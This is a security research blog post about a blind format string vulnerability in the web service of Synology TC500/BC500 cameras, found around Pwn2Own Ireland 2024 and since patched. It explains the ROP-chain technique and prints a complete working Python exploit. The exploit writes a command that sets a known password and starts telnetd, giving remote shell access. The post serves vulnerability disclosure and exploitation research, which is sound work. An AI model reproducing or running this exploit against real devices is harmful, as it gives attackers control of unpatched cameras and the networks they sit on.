Exploiting a Blind Format String Vulnerability in Modern Binaries: A Case Study from Pwn2Own Ireland 2024
30/10/2024
In October 2024, during the Pwn2Own event in Cork, Ireland, hackers attempted to exploit various hardware devices such as printers, routers, smartphones, home automation systems, NAS devices, security cameras, and more. This blog post highlights a challenging vulnerability that was patched just before the competition. Although it was fixed in time, it deserved more attention than simply being discarded.
Introduction
Prior to Pwn2Own 2024, a prestigious hacking competition known for showcasing exploits targeting widely used software and devices, the Synology TC500 security camera, which runs on a 32-bit ARM architecture, was found to be vulnerable to a format string bug. The vulnerability was located in the web service, in a function that parses HTTP requests and ends up passing request data as a format string.
Despite modern security measures such as Address Space Layout Randomization (ASLR), Position Independent Executables (PIE), Non-Executable memory (NX), and Full Relocation Read-Only (Full RelRO), the vulnerability remained exploitable under specific conditions.
The exploitation came with additional challenges: payloads were limited to 128 characters (with some reserved for the client IP address), and a range of characters (from 0x00 to 0x1F) was disallowed. Additionally, without memory leaks or visibility into the format string output from the client side, the exploit had to be performed in a blind context.
The vulnerable code snippet is as follows:
void mg_vsnprintf(const struct mg_connection *conn, int *truncated, char *buf, size_t buflen, const char *fmt, va_list ap) {
    int n;
    int ok;

    if ( buflen ) {
        n = vsnprintf(buf, buflen, fmt, ap);
        ok = (n & 0x80000000) == 0;
        if ( n >= buflen ) {
            ok = 0;
        }
        if ( ok ) {
            if ( truncated ) {
                *truncated = 0;
            }
            buf[n] = 0;
        } else {
            if ( truncated ) {
                *truncated = 1;
            }
            mg_cry(conn, "mg_vsnprintf", "truncating vsnprintf buffer: [%.*s]", (int)((buflen > 200) ? 200 : (buflen - 1)), buf);
            buf[n] = '\0';
        }
    } else if ( truncated ) {
        *truncated = 1;
    }
}

void mg_snprintf(const struct mg_connection *conn, int *truncated, char *buf, size_t buflen, const char *fmt, ...) {
    va_list ap;

    va_start(ap, fmt);
    mg_vsnprintf(conn, truncated, buf, buflen, fmt, ap);
}

void print_debug_msg(pthread_t thread_id, const char *fmt) {
    int i;

    if ( workerthreadcount > 0 ) {
        i = 0;
        do {
            if ( debug_table[i].tid == thread_id ) {
                mg_snprintf(0, 0, debug_table[i].buf, 0x80u, fmt); // Uncontrolled format string.
                debug_table[i].buf[strlen(fmt)] = 0;
            }
            ++i;
        } while ( i < workerthreadcount );
    }
}

void parse_http_request(struct mg_request_info *conn) {
    pthread_t tid;
    char buf[0x80];

    /* [...] */
    tid = pthread_self();
    /* [...] */
    memset(buf, 0, sizeof(buf));
    mg_snprintf(0, 0, buf, 0x80u, "%s%s", hostname, conn->request_uri); // Concat hostname to URI.
    if ( debug_table ) {
        print_debug_msg(tid, buf);
    }
    /* [...] */
}
The print_debug_msg function allows an attacker to control the format string passed to vsnprintf, leading to potential arbitrary memory writes. This blog post outlines our successful exploitation of this format string vulnerability, employing indirect memory manipulation techniques to bypass modern security measures and achieve arbitrary code execution.
Challenge Overview
Several technical challenges arose during the exploitation:
- Blind Exploitation: The absence of stack or base address leaks meant we had no visibility into the memory layout.
- ASLR and PIE: These mechanisms randomized the addresses of binaries and libraries, making it nearly impossible to rely on fixed addresses for gadgets or stack locations without compromising stability.
- Payload Limitations: The payload was restricted to 128 characters and could not contain null bytes or low ASCII characters ([0x00-0x1F]), further complicating the exploitation process.
Given these constraints, a classical stack-based format string exploitation approach was impractical.
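As a rough illustration of the payload constraints listed above, the following Python sketch checks a candidate URI against them. The function name, the constant names, and the way the client IP is subtracted from the 128-character budget are assumptions made for this example, not the camera's actual parsing logic.

```python
import struct

MAX_PAYLOAD = 128                    # buffer size quoted in the post
FORBIDDEN = set(range(0x00, 0x20))   # bytes 0x00-0x1F are rejected

def fits_constraints(uri: bytes, client_ip: str) -> bool:
    """Return True if `uri` respects the length and character limits (hypothetical helper)."""
    budget = MAX_PAYLOAD - len(client_ip)   # assumption: the IP prefix eats into the budget
    if len(uri) > budget:
        return False
    return not any(byte in FORBIDDEN for byte in uri)

ip = "192.168.15.10"
print(fits_constraints(b"AAAABBBB%916$hhn", ip))
# An absolute code address such as 0x00028a5c packs to bytes that include 0x00 and 0x02.
print(fits_constraints(struct.pack("<L", 0x00028A5C) + b"%7$n", ip))
```

The second call is rejected, which hints at why pointers cannot simply be embedded in the request and have to be derived from values already on the stack.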
Exploitation Strategy: Blind Format String Exploitation
The exploitation process required manipulating the format string to control memory writes. The key technique was to use a looping pointer to forge a controlled double stack pointer, allowing it to be adjusted in order to write to arbitrary locations on the stack.
1. Gaining Write Access to the Stack
The first step in our exploitation was to gain arbitrary write access to the stack. With no memory leaks, we had to work blindly. We found a looping pointer that could be modified to point to another area of the stack containing a valid stack pointer. By changing its least significant byte (LSB), we created a double pointer, allowing us to use the first pointer to modify the second, effectively pointing it to any location on the stack. This allowed us to write to a predictable stack location without needing to know its exact address.
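The double-pointer trick can be modelled with a toy memory map. The sketch below is not the camera's real stack layout: the slot offsets (0x10, 0x20, 0x40, 0x80), the helper names, and the assumption that the low byte of stack addresses is the same on every run are all invented for illustration.

```python
import random

def make_toy_stack():
    """Build an invented stack as a dict: address -> 32-bit word."""
    base = random.randrange(0x10000, 0x70000) << 12   # randomized, unknown to the attacker
    mem = {base + off: 0 for off in range(0, 0x100, 4)}
    loop_slot = base + 0x10      # holds a pointer to itself (the looping pointer)
    second_slot = base + 0x20    # holds some other valid stack pointer
    mem[loop_slot] = loop_slot
    mem[second_slot] = base + 0x80
    return mem, base, loop_slot, second_slot

def hhn(mem, slot, value):
    """Model %N$hhn: overwrite the low byte of the word that mem[slot] points to."""
    target = mem[slot]
    mem[target] = (mem[target] & ~0xFF) | (value & 0xFF)

def n(mem, slot, value):
    """Model %N$n: store a full 32-bit word where mem[slot] points."""
    mem[mem[slot]] = value & 0xFFFFFFFF

mem, base, loop_slot, second_slot = make_toy_stack()
hhn(mem, loop_slot, 0x20)         # the looping pointer now points at second_slot
hhn(mem, loop_slot, 0x40)         # retarget second_slot to stack offset 0x40
n(mem, second_slot, 0x41414141)   # the write lands at base + 0x40
print(hex(mem[base + 0x40]))
```

None of the three attacker steps uses `base`: only low bytes are ever supplied, which is what makes the approach workable without a leak.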
2. Building the ROP Chain on the Stack
Once we achieved arbitrary write access on the stack, we began constructing our ROP chain within unused space in the stack frame of the vulnerable function. This area is never touched, making it an ideal location for our exploit. Additionally, it was close enough to be accessed with a stack adjustment gadget, allowing us to execute our ROP chain.
Using the format string specifier %*X$c, we could read a value at a specific stack offset (such as the return address) and add it to the internal "character counter", because the value is consumed as the field width. We then incremented the counter by a fixed amount with a %Yc specifier (a plain field width of Y characters) before writing it back to our unused stack space with %Z$n. This technique allowed us to bypass both PIE and ASLR while building the ROP chain.
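To make the counter mechanics concrete, here is a small Python model of the three directives involved. It is a simplified sketch covering only this subset of printf behaviour (it ignores negative widths, flags, and every other conversion), and the runtime return address used in the example is a made-up value.

```python
import re

TOKEN = re.compile(r"%\*(\d+)\$c|%(\d*)c|%(\d+)\$(hhn|hn|n)")
MASKS = {"hhn": 0xFF, "hn": 0xFFFF, "n": 0xFFFFFFFF}

def simulate(fmt, args):
    """Return (final_counter, writes) for a tiny subset of printf directives."""
    counter, pos, writes = 0, 0, []
    for m in TOKEN.finditer(fmt):
        counter += m.start() - pos            # literal characters are printed as-is
        pos = m.end()
        star_arg, width, n_arg, n_kind = m.groups()
        if n_kind:                            # %N$n family: store the current counter
            writes.append((int(n_arg), counter & MASKS[n_kind]))
        elif star_arg:                        # %*N$c: width is read from argument N
            counter += max(1, args[int(star_arg)])
        else:                                 # %Wc: fixed width W, at least one char
            counter += max(1, int(width or 1))
    counter += len(fmt) - pos
    return counter, writes

# Hypothetical runtime return address: an assumed base of 0x480000 plus offset 0x28a5c.
args = {111: 0x004A8A5C}
counter, writes = simulate("%*111$c%100c%924$n", args)
print(hex(counter), writes)
```

The value stored through argument 924 is the return address plus 100, computed by vsnprintf itself without the attacker ever learning the address.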
Careful selection of gadgets was crucial, especially those appearing after the return address, to simplify the increment process:
ropper -f rootfs/bin/webd --nocolor --quality 1 --all | awk '{addr = strtonum($1)} addr > 0x28a5c'
This approach allowed us to build the ROP chain step by step, as follows:
- We adjusted the last pointer of the stack pointer chain to point to the gadget location within the unused stack space using %916$hhn.
- By reading the return address with %*111$c (the offset could vary depending on the system version) and modifying it with a specific offset, we temporarily stored the gadget address in the "char counter".
- We then wrote the gadget address from the character counter into the unused stack space using one of two techniques, depending on the result of the addition:
  - If the last 16 bits did not overflow after the addition, we used the %924$hn format specifier to overwrite the last 16 bits of the return address copy on the unused stack space.
  - If the addition caused the 16-bit value to overflow, we instead used %924$n to write the full gadget address directly in one shot. This was feasible due to the relatively low value of the code base address.
Although the one-shot write could be used for any gadget, we aimed to minimize its use for performance reasons: the higher the ROP gadget address, the larger the memory footprint for writing it.
This process was repeated until the entire ROP chain was constructed.
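The arithmetic behind the increment step can be sketched as follows. The return address offset 0x28a5c and the gadget offset 0xa8824 come from the exploit shown later in this post; the helper names, the sample base addresses, and the figure of 24 already-printed characters (a 16-character padded IP prefix plus two 4-byte markers) are assumptions drawn from that script for illustration.

```python
RET_OFFSET = 0x28A5C   # offset of the saved return address inside the binary
PRINTED = 16 + 8       # characters already printed: padded IP prefix + two markers

def padding_for(gadget_offset, ret_offset=RET_OFFSET, printed=PRINTED):
    """Width for the %Yc directive so that the counter ends up on the gadget."""
    pad = gadget_offset - ret_offset - printed
    if pad <= 0:
        raise ValueError("gadget must sit far enough after the return address")
    return pad

def counter_after(base, gadget_offset):
    """Counter value once the prefix, %*111$c and %Yc have all been processed."""
    return PRINTED + (base + RET_OFFSET) + padding_for(gadget_offset)

# The unknown load address cancels out: the same padding works for any base.
for base in (0x00400000, 0x004B3000, 0x00A71000):
    assert counter_after(base, 0xA8824) == base + 0xA8824

print(padding_for(0xA8824))
```

Because the padding only depends on the distance between two offsets in the same binary, it can be computed offline, which is why gadgets located after the return address are the convenient ones.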
3. Writing the Command Line
With the ROP chain established, we crafted the payload necessary to execute our final command. Our goal was to invoke a shell command via the system() function.
Due to payload restrictions, we wrote the command string one byte at a time over multiple requests, applying the following process for every character:
- We adjusted the last pointer of the stack pointer chain to point to the character location in our unused stack space.
- Using a basic format string, we incremented the char counter to the target byte value, then wrote it to the designated position in the unused stack space through our controlled stack pointer using %924$hhn.
For instance, we wrote the command sh${IFS}-c${IFS}'echo${IFS}synodebug:synodebug|chpasswd;telnetd' one byte at a time, meticulously controlling the memory writes through the format string. By the end of this process, the command was fully written in the unused stack space, ready for execution.
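The per-byte bookkeeping can be sketched like this. The slot number 14 and the count of 24 already-printed characters mirror the exploit script later in this post; the function name and the tuple layout are hypothetical and only serve the illustration.

```python
PRINTED = 16 + 8   # characters printed before the %Yc directive (assumed from the exploit)
CMD_SLOT = 14      # first fake-stack slot that holds the command string

def plan_command_writes(cmd: bytes):
    """Return one (slot, byte_index, width) tuple per command byte."""
    plan = []
    for i, value in enumerate(cmd):
        # Setting bit 8 keeps the width positive even when value < PRINTED;
        # %hhn only stores the low 8 bits of the counter, so the extra bit is dropped.
        width = ((1 << 8) | value) - PRINTED
        plan.append((CMD_SLOT + i // 4, i % 4, width))
    return plan

cmd = b"sh${IFS}-c"
plan = plan_command_writes(cmd)
for i, (slot, byte_index, width) in enumerate(plan):
    assert (PRINTED + width) & 0xFF == cmd[i]   # low byte of the counter is the target
print(plan[0])
```

Each tuple corresponds to one HTTP request, so the number of requests grows linearly with the length of the command.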
4. Finalizing the Exploit: Adjusting the Stack and Executing the ROP Chain
The concluding step involved adjusting the stack pointer to execute our prepared ROP chain. This was achieved by overwriting the return address with a gadget that modified the stack pointer, shifting it to a controlled position where the ROP chain awaited.
Once the return address was modified, the program would redirect execution into our ROP chain, eventually calling system() with the command stored in memory.
Here is the final version of the exploit for version 1.1.2-0416:
#!/usr/bin/env python3
import argparse
import urllib
import socket
import struct
import time


def get_args():
    def auto_int(x):
        return int(x, 0)

    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument("-?", "--help", action="help", help="show this help message and exit")
    parser.add_argument("-t", "--timeout", help="Timeout while receiving response", default=5, type=float)
    parser.add_argument("-S", "--shost", help="Source host", type=str)
    parser.add_argument("-P", "--dport", help="Remote port", default=80, type=int)
    parser.add_argument("-H", "--dhost", help="Remote host", default="192.168.15.91", type=str)
    args = parser.parse_args()
    return args


class Exploit():
    def __init__(self, shost, dhost, dport):
        self.prefix_padding_size = 16
        self.dhost = dhost
        self.dport = dport
        self.sock = self.connect()
        if not self.sock:
            exit(0)
        if shost:
            self.local_ip = shost
        else:
            self.local_ip = self.sock.getsockname()[0]

    def disconnect(self):
        self.sock.close()
        self.sock = None

    def connect(self):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(None)
            sock.connect((self.dhost, self.dport))
            return sock
        except Exception as e:
            return None

    def send_payload(self, payload):
        try:
            if not self.sock:
                self.sock = self.connect()
                if not self.sock:
                    exit(0)
            self.sock.send(payload)
            resp = self.sock.recv(4096)
        except Exception as e:
            pass
        self.disconnect()

    def prepare_payload(self, raw_payload, payload_char=0x42):
        """
        Append padding to the payload and check for bad chars.
        """
        assert not (self.local_ip is None)
        assert not (any(c in raw_payload for c in range(0, 0x21)))
        url = self.local_ip.encode().ljust(self.prefix_padding_size, b"B")[len(self.local_ip):]
        url += raw_payload
        payload = b"AAAA " # HTTP verb
        payload += url.ljust(115, bytes([payload_char])) # make sure we trigger the truncation
        payload += b" CCCC\r\n\r\n" # HTTP version
        return payload

    def stage_0(self):
        """
        Craft a double stack pointer from a looping one.
        The looping pointer is at offset 916, we make it point to the offset 924.
        The pointer at offset 924 is pointing to the offset 153.
        """
        print("[+] Crafting a double stack pointer...")
        raw_payload = b""
        raw_payload += struct.pack("<L", 0x41414141)
        raw_payload += struct.pack("<L", 0x42424242)
        raw_payload += f"%{0xe0 - (len(raw_payload) + self.prefix_padding_size)}c".encode()
        raw_payload += b"%916$hhn" # overwrite the LSB of the looping pointer.
        payload = self.prepare_payload(raw_payload)
        self.send_payload(payload)

    def point_to_fake_stack(self, stack_offset, shift=0):
        """
        Make our controlled stack pointer at offset 924 pointing to our fake stack at a given offset.
        """
        raw_payload = b""
        raw_payload += struct.pack("<L", 0x41414141)
        raw_payload += struct.pack("<L", 0x42424242)
        raw_payload += f"%{0x50 + ((stack_offset*4) + shift) - (len(raw_payload) + self.prefix_padding_size)}c".encode()
        raw_payload += b"%916$hhn"
        payload = self.prepare_payload(raw_payload)
        self.send_payload(payload)

    def point_to_ret_addr(self):
        """
        Make our controlled stack pointer at offset 924 pointing to our return address (offset 111).
        """
        raw_payload = b""
        raw_payload += struct.pack("<L", 0x41414141)
        raw_payload += struct.pack("<L", 0x42424242)
        raw_payload += f"%{0x12c - (len(raw_payload) + self.prefix_padding_size)}c".encode()
        raw_payload += b"%916$hhn"
        payload = self.prepare_payload(raw_payload)
        self.send_payload(payload)

    def copy_ret_addr_to_ptr(self):
        """
        Copy the return address to the controlled stack pointer at offset 924.
        """
        raw_payload = b""
        raw_payload += struct.pack("<L", 0x41414141)
        raw_payload += struct.pack("<L", 0x42424242)
        raw_payload += b"%*111$c"
        raw_payload += b"%924$n"
        payload = self.prepare_payload(raw_payload)
        self.send_payload(payload)

    def write_webd_gagdet_to_fake_stack(self, gadget_offset, stack_offset):
        """
        Write WEBD gadget to our fake stack at a given offset.
        """
        origin_ret_addr = 0x28a5c
        assert not (gadget_offset < origin_ret_addr & ((1<<16)-1))
        self.point_to_fake_stack(stack_offset)
        raw_payload = b""
        raw_payload += struct.pack("<L", 0x41414141)
        raw_payload += struct.pack("<L", 0x42424242)
        raw_payload += b"%*111$c" # we use the return address as a reference to our gadget.
        if gadget_offset - (origin_ret_addr + (len(raw_payload) + self.prefix_padding_size)) > 0: # check if we can just increment the return address.
            offset = gadget_offset - (origin_ret_addr + (len(raw_payload) + self.prefix_padding_size))
            str_offset = str(offset+len("%999999")).ljust(len("999999") - 2, "c")
            raw_payload += f"%{str_offset}c".encode()
            raw_payload += b"%924$n"
        else: # or if we need to overwrite the last two bytes of the return address.
            self.copy_ret_addr_to_ptr()
            offset = (gadget_offset & ((1<<16)-1) | 1 << 16) - (origin_ret_addr & ((1<<16)-1)) - (len(raw_payload) + self.prefix_padding_size)
            str_offset = str(offset+len("%999999")).ljust(len("999999") - 2, "c")
            raw_payload += f"%{str_offset}c".encode()
            raw_payload += b"%924$hn"
        payload = self.prepare_payload(raw_payload)
        self.send_payload(payload)

    def write_byte_to_fake_stack(self, value, stack_offset, value_offset):
        """
        Overwrite one byte value of our fake stack at a given offset and index.
        """
        origin_ret_addr = 0x28a5c
        assert not (value >> 31 == 1) # can't write signed value in one shot.
        self.point_to_fake_stack(stack_offset, value_offset)
        raw_payload = b""
        raw_payload += struct.pack("<L", 0x41414141)
        raw_payload += struct.pack("<L", 0x42424242)
        offset = ((1<<8) | value) - (len(raw_payload) + self.prefix_padding_size)
        raw_payload += f"%{str(offset)}c".encode()
        raw_payload += b"%924$hhn"
        payload = self.prepare_payload(raw_payload, payload_char=value)
        self.send_payload(payload)

    def stage_1(self):
        """
        Prepare our fake stack.
                +------ fake stack offset
                |   +-- format string offset
                V   V
        0000: |00│120│ add_sp_20h_pop5-fmt_offset // r4: prepare the return address value before overwriting saved pc.
        0004: |01│121│ junk // r5
        0008: |02│122│ junk // r6
        000c: |03│123│ junk // r7
        0010: |04│124│ junk // r8
        0014: |05│125│ pop_r3 // pc: just to control the next blx r3.
        0018: |06│126│ pop_r4_r5 // r3
        001c: |07│127│ add_r1_sp_18h_blx_r3 // pc: r1 points to the offset 0x38
        0020: |08│128│ junk // r4
        0024: |09│129│ junk // r5
        0028: |10│130│ pop_r3 // pc
        002c: |11│131│ bl_system // r3
        0030: |12│132│ mov_r0_r1_blx_r3 // pc: make r0 pointing to our payload
        0034: |13│133│ junk
        0038: |14│134│ "sh${IFS}-c${IFS}'echo${IFS}synodebug:synodebug|chpasswd;telnetd'"
        """
        print("[+] Building a fake stack...")
        add_sp_20h_pop5 = 0x000294bc # add sp, sp, #0x20; pop {r4, r5, r6, r7, r8, pc};
        pop_r3 = 0x000a8824 # pop {r3, pc}
        add_r1_sp_18h_blx_r3 = 0x00042bd0 # add r1, sp, #0x18; add r0, r4, #8; blx r3;
        bl_system = 0x00025ddc # bl system
        mov_r0_r1_blx_r3 = 0x0003fd5c # mov r0, r1; blx r3;
        pop_r4_r5 = 0x0003f5dc # pop {r4, r5, pc};
        self.write_webd_gagdet_to_fake_stack(gadget_offset=add_sp_20h_pop5-24, stack_offset=0)
        self.write_webd_gagdet_to_fake_stack(gadget_offset=pop_r3, stack_offset=5)
        self.write_webd_gagdet_to_fake_stack(gadget_offset=pop_r4_r5, stack_offset=6)
        self.write_webd_gagdet_to_fake_stack(gadget_offset=add_r1_sp_18h_blx_r3, stack_offset=7)
        self.write_webd_gagdet_to_fake_stack(gadget_offset=pop_r3, stack_offset=10)
        self.write_webd_gagdet_to_fake_stack(gadget_offset=bl_system, stack_offset=11)
        self.write_webd_gagdet_to_fake_stack(gadget_offset=mov_r0_r1_blx_r3, stack_offset=12)
        cmd = b"sh${IFS}-c${IFS}'echo${IFS}synodebug:synodebug|chpasswd;telnetd'"
        for i, char in enumerate(cmd):
            stack_offset=(14+(i//4)) # 14 is the offset of our command string inside our fake stack.
            self.write_byte_to_fake_stack(value=char, stack_offset=stack_offset, value_offset=i%4)

    def stage_2(self):
        """
        Overwrite the return address with the value stored at the offset 0 of our fake stack (offset 120).
        """
        print("[+] Overwriting PC...")
        self.point_to_ret_addr()
        raw_payload = b""
        raw_payload += struct.pack("<L", 0x41414141)
        raw_payload += struct.pack("<L", 0x42424242)
        raw_payload += b"%*120$c" # we use our fake stack value.
        raw_payload += b"%924$n"
        payload = self.prepare_payload(raw_payload)
        self.send_payload(payload)


def main(args):
    exploit = Exploit(args.shost, args.dhost, args.dport)
    exploit.stage_0()
    exploit.stage_1()
    exploit.stage_2()
    print("[+] Woot!")


if __name__ == "__main__":
    args = get_args()
    main(args)
Conclusion
This exploit illustrates how format string vulnerabilities, when paired with specific format specifiers, can bypass modern defenses such as ASLR and PIE. By using a looping pointer to control writes to the stack, we built a functional ROP chain without relying on direct memory leaks or brute-force methods.
This vulnerability impacted Synology TC500 and BC500 cameras from version 1.1.1-0383 and was patched in version 1.1.3-0442 (see changelog) before Pwn2Own, meaning the exploit could not be executed during the competition.